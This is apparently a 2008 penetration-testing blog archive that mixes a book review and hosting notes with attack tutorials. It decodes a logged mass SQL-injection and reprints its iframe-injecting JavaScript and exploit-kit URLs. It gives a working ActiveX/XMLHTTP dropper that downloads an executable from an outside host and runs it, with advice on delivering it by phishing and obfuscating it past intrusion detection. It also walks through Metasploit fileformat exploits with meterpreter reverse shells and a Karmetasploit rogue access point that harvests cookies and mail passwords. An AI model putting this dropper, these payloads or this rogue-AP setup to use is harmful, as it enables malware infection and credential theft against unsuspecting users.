Sunday, August 31, 2008

cute...

checking web logs...

71.191.45.109 - - [30/Aug/2008:19:06:39 +0000] "GET /hack/brutessh2.c?';DECLARE%
20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636861722832353529
2C40432076617263686172283430303029204445434C415245205461626C655F437572736F722043
5552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F
626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E
6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E7874797065
3D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F43757273
6F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D3029204245
47494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D27
27223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568
756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40
432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E
3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F637372
73732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F
4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F534520546162
6C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4
000));EXEC(@S); HTTP/1.1" 501 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Window
s NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

Decodes to:
DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id an?? a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@F??TCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''">//script src="hxxp://www0.douh??nqn.cn/csrss/w.js"//script////!--''+['+@??+'] where '+@C+' not like ''%"//script src="hxxp://www0.douhunqn.cn/csr??s/w.js"//script//!--''')FETCH NEXT FRO?? Table_Cursor INTO @T'@C END CLOSE Tab??e_Cursor DEALLOCATE Table_Cursor

the java:

window.onerror=function()
{
document.write("//iframe width="0" height="0" src="hxxp://www0.douhunqn.cn/csrss/new.htm">//iframe>");
return true;
}
if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('//iframe marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="hxxp://count41.51yes.com/sa.aspx?id="419214144'+yesdata+'" height="0" width="0">//iframe>');


document.write("//iframe width="0" height="0" src="hxxp://www0.douhunqn.cn/csrss/new.htm">//iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(iyesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

new.htm is nice:

launches several iframes that launch several other attacks. very nice. I'll let you pull down that code.

hxxp://www0.douhunqn.cn/csrss/lzx.htm
hxxp://www0.douhunqn.cn/csrss/IERPCtl.IERPCtl.1
hxxp://www0.douhunqn.cn/csrss/real11.htm
hxxp://www0.douhunqn.cn/csrss/real10.htm
hxxp://www0.douhunqn.cn/csrss/S.S
hxxp://www0.douhunqn.cn/csrss/Bfyy.htm --> Storm Player Exploit

The only exploit that was there was the real11.htm one :-(

new.htm also serves up:
//iframe src=hxxp://www.ppexe.com/csrss/06014.htm width=100 height=0>
//iframe src=hxxp://www.ppexe.com/csrss/flash.htm width=100 height=0>
//Iframe src=hxxp://www.ppexe.com/csrss/net.htm width=100 height=0>
//Iframe src=hxxp://www.ppexe.com/csrss/ff.htm width=100 height=0>

that malware with the .exe's are still available

there is a good write up of most of the code here

http://blogs.technet.com/mmpc/archive/2008/08/28/a-normal-day-at-the-office.aspx

Saturday, August 30, 2008

Setting up my "slice" from slicehost

If you are looking to have your own box and get your hands dirty with Linux administration then slicehost is a great option for you.

My last hosting company didn't allow me access to log files and were just an overall pain to work with. I can tell you that if Alan Shimel had had my hosting company the guys that took over his domain probably wouldn't have had the patience to wait out what it took me to move mine...anyway I digress.

Slicehost is great, here is a breakdown of their plans:

RAM PRICE HD BW


256 slice $20.00 10GB 100GB

512 slice $38.00 20GB 200GB

1GB slice $70.00 40GB 400GB

2GB slice $140.00 80GB 800GB

4GB slice $280.00 160GB 1600GB

You start with a slimmed down version of one of the following OS's"

Arch 2007.08
CentOS 5.2
Debian 4.0 (etch)
Fedora 9
Gentoo 2008.0
Ubuntu 7.10 (gutsy)
Ubuntu 8.04.1 LTS (hardy)

My Ubuntu install was only about half a gig, so I had plenty of space for the carnal0wnage site even though the blog really takes all the traffic. I'm not going to do a lockdown guide, there are so many on the net, but you basically SSH in (also has a web console if you get locked out) and start "apt-getting" what you need to set up your box they way YOU want it. You also have full reboot privileges or if you really hose up your install you can just reformat.

Things I did:

installed stuff I probably don't need :-)
locked down sshd
installed apache2 and modsecurity
configured DNS for web and google mail
installed and configured denyhosts
started tweaking iptables rules

You can't beat 20 bucks a month for an IP and root on your own box ;-)

They also have an API so you can script management and status tasks
http://articles.slicehost.com/2008/5/13/slicemanager-api-documentation

Extra Help
http://cactuswax.net/articles/slicehost-configuration/
http://www.usefuljaja.com/2007/4/setting-up-your-domain
http://www.vinno.net/linux/server/how-to-install-mod-security-2

Wednesday, August 27, 2008

Owning the Client without an Exploit

So after a long hiatus of no posts I figured it was time to step up and post something that may be of interest to pentesters. In the spirit of continuity to some previous posts about client-side attacks and as a follow up to some discussions that Chris and I have been having, this post will be about Client-side Ownage.

It's nothing groundbreaking but may have a place in your arsenal of tools and attack vectors. What do you do when all those cool client-side attacks in Metasploit fail? Damn those companies that patch 3rd party products. As shown in the previous posts it's still possible to gather a great deal of information about the remote user, host and network using PHP and some Java but what do you do when you need a foothold on that host to pivot further into the network?

Enter the Dropper. Using JavaScript and Microsoft's XMLHTTPRequest Object it is possible to download and run your backdoor with just a little interaction from the victim. The XMLHTTPRequest Object, a core component of AJAX, provides support for client-side communication with a HTTP server. A user can make use of the XMLHTTP Object to send a request and have the XML DOM parse that request. Great if you have data such as XML that you need to parse and display on a page for example.

What about requesting another file type like, oh I don't know, an exe? This might have some value. :) Lets take a look at a JavaScript function to do just that.

First we need to create our object elements and the required attributes needed to download and execute the file we want:

function dropper() {

var x = document.createElement('object');
x.setAttribute('id','x');
x.setAttribute('classid','clsid:D96C556-65A3-11D0-983A-00C04FC29E36');

try {
var obj = x.CreateObject('msxml2.XMLHTTP','');
var app = x.CreateObject('Shell.Application','');
var str = x.CreateObject('ADODB.stream','');

We use document.createElement to create an element and use it in conjunction with setAttribute to modify the attributes of each new element. The classid in use is a Remote Data Service object. It allows the execution of code from a remote source. Search your registry and you'll see that it is assigned to RDS.DataSpace, a non-visual ActiveX control, which handles remote data connections. This function is part of Microsoft's MDAC.

We create our msxml2.XMLHTTP object which will handle communication with the web server that is hosting our executable.

Then we use the Object element to instantiate a Shell Object which is identified by the CLASSID.

The ADODB.Stream object in ActiveX, which contains methods to manage a stream of binary data or text, is used to handle the storing and saving of the data to a file.

Now let's grab the file, install it to a directory of our choice and run it.

try {
str.type = 1;
obj.open('GET','http://coolsite.com//innocent.exe',false);
obj.send();
str.open();
str.Write(obj.responseBody);
var path = './/..//svchosts.exe';
str.SaveToFile(path,2);
str.Close();
}
catch(e) {}

First we use the Type property to set the type of data in the stream object. 1 is for Binary.

Next we use the XMLHTTPRequest Open Method intialize an MSXML2.XMLHTTP request in which we specify the retrieval method, URL and authentication information if any. The XMLHTTPRequest Send Method allows us to send the HTTP request to the server.

The ADODB.stream Open Method is used to create and open a Stream opject. The ADODB.stream Write Method is used to write the binary data to a binary Stream object. After specifying the path we now use the ADODB.stream SaveToFile method is used to save contents of our open Stream object to a local file of our choosing. In this case we use am option value of 2 that overwrites the file if it already exists. We then close the object.

The next step is to use our Shell Object to execute our newly downloaded executable using the shellexecute function.

try {
app.shellexecute(path);
}
catch(e) {}
}
catch(e) {}
}

Place this code in a webpage either directly or through an include, create a good phishing email (see other posts) and send it off to your victims. Before anyone makes mention that this requires ActiveX to run remember that enough users will allow ActiveX controls to be run for it to be useful. On I.E. 6 this should perform a silent download and on I.E. 7 it will prompt the user.

You can add additional code to the page to check the browser version and prompt the user to either change to IE or have a direct link to the file for the user to click and run. Remember it just takes one user that follows the link to give you access.

One other thing to consider is IDS/IPS evasion. The code above will likely get flagged by an IDS in the form it is now. Look at JavaScript obfuscation techniques such as 'string-splitting', arguments.callee() and other methods to evade the IDS or just hide your code.

Variants of this method we have just discussed are actually widely used by malware authors on their sites to drop files onto users systems. Have a look at the next spam email you get and decode the JavaScript on the page.

Cheers,

Tuesday, August 26, 2008

BGP Eavesdropping

From Wired:

Two security researchers have demonstrated a new technique to stealthily intercept internet traffic on a scale previously presumed to be unavailable to anyone outside of intelligence agencies like the National Security Agency.

The tactic exploits the internet routing protocol BGP (Border Gateway Protocol) to let an attacker surreptitiously monitor unencrypted internet traffic anywhere in the world, and even modify it before it reaches its destination.

The man-in-the-middle attack exploits BGP to fool routers into re-directing data to an eavesdropper's network.

Anyone with a BGP router (ISPs, large corporations or anyone with space at a carrier hotel) could intercept data headed to a target IP address or group of addresses. The attack intercepts only traffic headed to target addresses, not from them, and it can't always vacuum in traffic within a network -- say, from one AT&T customer to another.

The method conceivably could be used for corporate espionage, nation-state spying or even by intelligence agencies looking to mine internet data without needing the cooperation of ISPs.

http://blog.wired.com/27bstroke6/2008/08/revealed-the-in.html

2nd post on it
http://blog.wired.com/27bstroke6/2008/08/how-to-intercep.html


slides from Defcon: https://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-pilosov-kapela.pdf

Book Review: The IDA Pro Book

I was able to pick up a pre-released copy of The IDA Pro book at Defcon in the vendor area, thanks to Adam from No Starch. This book is not an introduction to reverse engineering, its a hard core manual for IDA Pro. IDA Pro is a critical weapon in any reverser's arsenal, so proficiency in this tool is paramount to your success in reverse engineering. If you are new to IDA Pro you need this book, even if you've been working with IDA for a while you will more than likely learn quite a few things after reading it. Unlike the two other books I've read on IDA Pro this book has no fluff or filler, its solid information! The funny thing when comparing it to the other two IDA books is its thicker than both combined, and contains an exponentially larger amount of information.

The author takes time to explain things in a very clear manner as you walk through from an introduction to the tool to more advanced usage such as customizing, extending IDA, debugging, and dealing with obfuscated code. The author answered questions I had been spent weeks asking and searching the Internet for.


Likes:

Just about everything. The author walks you through plenty of code and discusses scenarios where you could apply the information he is giving you. The fact that he took his time to elaborate on why, and when you might use a piece of information is unlike many authors whom will give you information and leave the reader wondering "What would I use that for".

This book does not just talk about Win32 and Portable Executable format, ELF binaries have a continual guest appearance throughout the book, and firmware/binaries are mentioned in numerous chapters.

Side bar elaboration is kept to a minimum, I often find in texts that an author will go on about background information that does not add anything significant to what I am reading. Chris Eagle keeps this to a minimum adding small side bars when necessary but only take up a small amount of real estate.


Dislikes

My only dislike of this book was the use of PE format as the example in chapter 18 – Binary Files and Ida Loader modules. Despite the use of a well known format chosen for this example the concepts were clearly displayed. I think it would have made it more interesting if the author had used a lesser known format, or do as the author of "Reversing, Secrets of Reverse Engineers" did and create his own binary.


-Phn1x

Senspost reDuh released

Finally!

I've been waiting to play with this tool since the presentation at Defcon. Tunneling TCP through well formed HTTP which decodes it on the other end back into TCP is a pretty handy option.

"What Does reDuh Do?
reDuh is actually a tool that can be used to create a TCP circuit through validly formed HTTP requests.

Essentially this means that if we can upload a JSP/PHP/ASP page on a server, we can connect to hosts behind that server trivially"

Here's the link(s).
http://www.sensepost.com/blog/2399.html

http://www.sensepost.com/research/reDuh/

expect some more info soon.

Saturday, August 23, 2008

Metasploit and File Format Bugs

Client-side attacks are where its at and being able to send a legitimate looking file to a user to do their double-clicky thing on is the bomb.

MC has released a FileFormat mixin for metasploit which allows you to exploit fun bugs like 08-011 and other bugs that involve a user opening some sort of attachment.

Here is the link the fileformat mixin
http://www.metasploit.com/users/mc/rand/fileformat.rb

To use it, you need to add:

require 'msf/core/exploit/fileformat' to msf3/lib/msf/core/exploit.rb

and stick fileformat.rb in the msf3/lib/msf/core/exploit/ directory

Now remembering my previous post on adding exploits to metasploit we can do the same for mixins.

so my exploit.rb file actually said:

require '/home/cg/.msf3/lib/msf/core/exploit/fileformat'

And don't worry, if you jacked something up Metasploit will let you know.

cg@WPAD:~/evil/msf3$ ./msfconsole
./lib/msf/core/exploit.rb:241:in `require': no such file to load --
/home/cg/.msf3/lib/msf/core/exploit/fileformat (LoadError)


For our example we'll use a vulnerability in the ActiveX control for eTrust PestScan
http://www.metasploit.com/users/mc/rand/etrust_pestscan.rb


From the description in the module:

This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.

Example Time!

msf > use exploit/windows/fileformat/etrust_pestscan
msf exploit(etrust_pestscan) > info


Name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
Version: $Revision:$

Platform: Windows

Privileged: No

License: Metasploit Framework License


Provided by:
MC


Available targets:

Id Name

-- ----

0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7


Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

FILENAME MSF no The file name.


Payload information:

Space: 1024

Avoid: 1 characters


Description:
This module exploits a stack overflow in CA eTrust PestPatrol. When

sending an overly long string to the Initialize() property of

ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary

code. This control is not marked safe for scripting, so choose your

attack vector accordingly.


References:

http://www.w00t-shell.net/#

http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm

msf exploit(etrust_pestscan) > show options


Module options:


Name Current Setting Required Description
---- --------------- -------- -----------

FILENAME MSF no The file name.

Exploit target:

Id Name

-- ----

0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7


msf exploit(etrust_pestscan) > set FILENAME DEMO.html
FILENAME => DEMO.html

msf exploit(etrust_pestscan) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(etrust_pestscan) > set LHOST 192.168.0.101

LHOST => 192.168.0.101

msf exploit(etrust_pestscan) > show options


Module options:


Name Current Setting Required Description

---- --------------- -------- -----------

FILENAME DEMO.html no The file name.


Payload options (windows/meterpreter/reverse_tcp):


Name Current Setting Required Description

---- --------------- -------- -----------
DLL /home/cg/evil/msf3/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC process yes Exit technique: seh, thread, process

LHOST 192.168.0.101 yes The local address

LPORT 4444 yes The local port


Exploit target:

Id Name

-- ----

0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7


msf exploit(etrust_pestscan) > exploit
[*] Started reverse handler

[*] Creating HTML file ...

[*] File is located in ./data/exploits/ ...

msf exploit(etrust_pestscan) >


Fileformat bugs are going to you to require to run the multi/handler so you can catch the return shells.

cg@WPAD:~/evil/msf3$ ./msfcli

Usage: ./msfcli [mode]

====================================================

Mode Description

---- -----------

(H)elp You're looking at it baby!

(S)ummary Show information about this module

(O)ptions Show available options for this module

(A)dvanced Show available advanced options for this module

(I)DS Evasion Show available ids evasion options for this module

(P)ayloads Show available payloads for this module

(T)argets Show available targets for this exploit module

(AC)tions Show available actions for this auxiliary module

(C)heck Run the check routine of the selected module

(E)xecute Execute the selected module


cg@WPAD:~/evil/msf3$ ./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E

[*] Started reverse handler

[*] Starting the payload handler...


***Work your magic to get the client to open the html file***

[*] Transmitting intermediate stager for over-sized stage...(89 bytes)

[*] Sending stage (2650 bytes)

[*] Sleeping before handling stage...

[*] Uploading DLL (73227 bytes)...

[*] Upload completed.

[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.103:4360)


meterpreter >

Thursday, August 21, 2008

Shared Passwords Giving Up The Goods

Shared passwords, especially shared VNC password remind me of the straw house from the three little pigs...

In addition to the previous post on having the Domain Users group in the Enterprise Admins group (FTW!) on my last trip the organization had decided to use VNC for workstation management instead of Dameware/Remote Desktop.

Why? I have no idea. At least with RDP and Dameware you can force admins to use domain credentials to log in. But for whatever reason they had chose to use VNC on their workstations, servers used RDP. The VNC sessions were password protected

Well they had some sort of video feed linked to a webpage so people could watch the feeds from a single webpage. A simple right click on the feed properties showed an un-obfuscated VNC password (even had a check box that could have starred it out...oops). Surely the VNC properties for the feeds wouldn't be the same VNC for the workstations right? Wrong, they were. Game over. We could now log into all the workstations. We were already Enterprise Admin and could psexec into the workstations but screen shots of watching people read their email just look so much better during the outbrief :-)

Monday, August 18, 2008

Metasploit + Karma=Karmetasploit Part 2

Ok, so we have everything up and running (first post) and waiting for some random person...err your lab wifi box to connect to Karmetasploit.

We take a look at our current network connection before airbase-ng starts doing its thing.


*Note the blistering connection I had at the hotel.

Now we take a look at some of the available APs after airbase-ng starts doing its thing.


And lastly my computer connected to the hhonors AP


After that we open up our browser and try to go to google.com and we get the portal page that karmetasploit presents.



But as soon as we click enter or try to browse to a different URL a whole bunch of iframes start doing their thing trying to do the cookie theft and exploitation. You can see it in the bottom left corner.


Here we can see the result of ipconfig /all and see that my DHCP Server and DNS server is from karmetasploit.


A shot of airbase-ng doing its thing


Iphones connecting up

Cookie theft

POP password gathering

I saw the SMB Relay attack attempted a couple of times but I didnt see any of the other client side attacks being launched. Not sure what the issue is. I'm going to try it with a known vulnerable version of IE6 and see if I can get some better results. First instinct is that the browser enumeration code in browswer_autopwn isnt working quite right therefore not sending and clients sides out, but I could be wrong.

That's it for now.

Day in the life of pentester #4

Day in the life of a pentester.

This one is short and sweet. Some things you probably shouldn't do.

1. fail use clear text protocols
2. get caught not following your own password policies
& the best one
3. add your Domain Users group to the Enterprise Admins group...oops ;-)

Internal test, some simple ARP Spoofing and LDAP query caught in plain text, RDP in, create a user account and add them to the appropriate admin group...done.

Sunday, August 17, 2008

Defcon Thoughts

Everyone else (g0ne, ncircle, terminal23) is doing their thoughts on Defcon so I figured I would too. I've been waiting on a couple of people to actually post the code they talked about but I'm growing impatient and I guess I can use the release for other posts.

Let's start with the Cons:
-The Badges...oops that sucked...least not getting one when I first paid, the blinky lights were cool. At least mine worked this year.
-The stench...oops that stunk...like rotting corpse bad.
-The Goons...hmmm what to say...I know you have a tough job with crowd control and whatnot but do you really have to talk to everyone like they are assholes? I'm not sure you have a reason to be screaming at 11am Friday morning, save that shit for Sunday.
-The Crowds...sucks...that narrow ass hallway combined with the stench = no fun
-The Talks...I didn't care for most of the talks (maybe I just picked bad), of course there were a few good ones, but props to everyone that submitted a paper and stood up there in front of a ton of people. I think the boss is convinced to do BH next year, everyone I talked to that went to BH was pleased with the talks.

The Pros:
-The Parties...303, hackerpimps, securabit/i-hacker, offensive computing, freakshow, i-sight, core impact, etc
-The People...not the crowds but getting to meet in person people I talk to online all the time...regrets...not making it to the security twits meetup.
-The CTF...I had people explain a to me a little better than last year what the hell is actually going on. Pretty interesting.
-The Guitar Hero competition...fun!
-The Swag...my green/black defcon coffee cup rulez.
-The Twitter(ing)...very cool watch the twits in real time during talks...mvp to jjx for most tweets or twits or whatever they are called.

I'll do a separate post on the talks I thought stood out at Defcon.

Friday, August 15, 2008

Crash Course In Penetration Testing Workshop at Toorcon

Joe and I will be conducting our Crash Course In Penetration Testing Workshop at Toorcon in September.

http://sandiego.toorcon.org/content/section/4/8/

Description

Instructors: Joseph McCray & Chris Gates
Includes: 250GB 2.5" USB Harddrive preloaded with lab VMWare images

This course will cover some of the newer aspects of pen-testing covering; Open Source Intelligence Gathering with Maltego and other Open Source tools, Scanning, Enumeration, Exploitation (Both remote and client-side) and Post-Exploitation relying heavily on the features included in the Metasploit Framework. We'll discuss our activities from both the Whitebox and Blackbox approach keeping stealth in mind for our Blackbox activities.

Web Application penetration testing will be covered as well with focus on practical exploitation of cross-site scripting (XSS), cross-site request forgery (CSRF), local/remote file includes, and SQL Injection.

The course will come with a complementary USB Harddrive loaded with the lab Virtual Machine images for you to play with so you can continue to hone your skills and learn new techniques even after the course is finished. Attendees will walk away with a current knowledge of how to pen-test both a network and a web application, all of the basic tools needed, and a set of practice exercises that they can use to improve their skills.

Thursday, August 14, 2008

Metasploit + Karma=Karmetasploit Part 1

HD Moore released some documentation to get karmetasploit working with the framework.

First you'll have to get an updated version of aircrack-ng because you'll need airbase-ng. I had 0.9.1 so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch,(I used the 2nd patch), so apply that before you make/make install.

You may also need a current version of madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall. Ok, so got an updated version of aircrack, patched airbase-ng, and madwifi drivers and can inject packets? Let's continue.

Let's do our aireplay-ng test to see if things are working:

root@WPAD:/home/cg# aireplay-ng --test ath40
19:55:44 Trying broadcast probe requests...

19:55:44 Injection is working!

19:55:46 Found 5 APs


19:55:46 Trying directed probe requests...
19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'

19:55:52 0/30: 0%


19:55:52 00:14:06:11:42:A2 - channel: 4 - 'VEGAS.com'
19:55:58 0/30: 0%


19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80

19:56:03 5/30: 16%


19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'

19:56:09 0/30: 0%


19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
19:56:15 0/30: 0%


Look's like we are good.

Now just follow the steps in the documentation, I installed dhcpd3 and set up my conf file, I did a svn update on the metasploit trunk, made sure the sqlite3 stuff was working and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward.

With all the config files set up its pretty easy to get things going.

root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
02:59:55 Created tap interface at0
02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
----snip------
03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet
**You get the idea...


airbase-ng creates an at0 tap so you have to configure it and set the mtu size (all this if from the karmetasploit documentation)

root@WPAD:/home/cg/evil/msf3# ifconfig at0 up 172.16.1.207 netmask 255.255.255.0

root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400

root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800

After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on.

root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

Internet Systems Consortium DHCP Server V3.0.5
Copyright 2004-2006 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 4 leases to leases file.
Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on Socket/fallback/fallback-net


After that we run our karma.rc file within using msfconsole.

root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc



=[ msf v3.2-release

+ -- --=[ 304 exploits - 124 payloads

+ -- --=[ 18 encoders - 6 nops

=[ 79 aux


resource> load db_sqlite3

[*] Successfully loaded plugin: db_sqlite3

resource> db_create /root/karma.db

[*] The specified database already exists, connecting

[*] Successfully connected to the database

[*] File: /root/karma.db

resource> use auxiliary/server/browser_autopwn

resource> setg AUTOPWN_HOST 172.16.1.207

AUTOPWN_HOST => 172.16.1.207

resource> setg AUTOPWN_PORT 55550

AUTOPWN_PORT => 55550

resource> setg AUTOPWN_URI /ads

AUTOPWN_URI => /ads

resource> set LHOST 172.16.1.207

LHOST => 172.16.1.207

resource> set LPORT 45000

LPORT => 45000

resource> set SRVPORT 55550

SRVPORT => 55550

resource> set URIPATH /ads

URIPATH => /ads

resource> run

[*] Starting exploit modules on host 172.16.1.207...

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto

[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava

[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface

[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe

[*] Server started.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core

[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core

[*] Server started.

[*] Started reverse handler

[*] Server started.

[*] Using URL: http://0.0.0.0:55550/ads

[*] Local IP: http://127.0.0.1:55550/ads

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/pop3

resource> set SRVPORT 110

SRVPORT => 110

resource> set SSL false

SSL => false

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/pop3

resource> set SRVPORT 995

SRVPORT => 995

resource> set SSL true

SSL => true

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/ftp

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/imap

resource> set SSL false

SSL => false

resource> set SRVPORT 143

SRVPORT => 143

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/imap

resource> set SSL true

SSL => true

resource> set SRVPORT 993

SRVPORT => 993

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/smtp

resource> set SSL false

SSL => false

resource> set SRVPORT 25

SRVPORT => 25

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/smtp

resource> set SSL true

SSL => true

resource> set SRVPORT 465

SRVPORT => 465

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/fakedns

resource> unset TARGETHOST

Unsetting TARGETHOST...

resource> set SRVPORT 5353

SRVPORT => 5353

resource> run

[*] Auxiliary module running as background job

resource> use auxiliary/server/fakedns

resource> unset TARGETHOST

Unsetting TARGETHOST...

resource> set SRVPORT 53

SRVPORT => 53

resource> run

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 80

SRVPORT => 80

resource> set SSL false

SSL => false

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 8080

SRVPORT => 8080

resource> set SSL false

SSL => false

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 443

SRVPORT => 443

resource> set SSL true

SSL => true

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 8443

SRVPORT => 8443

resource> set SSL true

SSL => true

resource> run

[*] Server started.

[*] Auxiliary module running as background job

msf auxiliary(http) >


Next post we'll see karmetasploit in action.

Monday, August 4, 2008

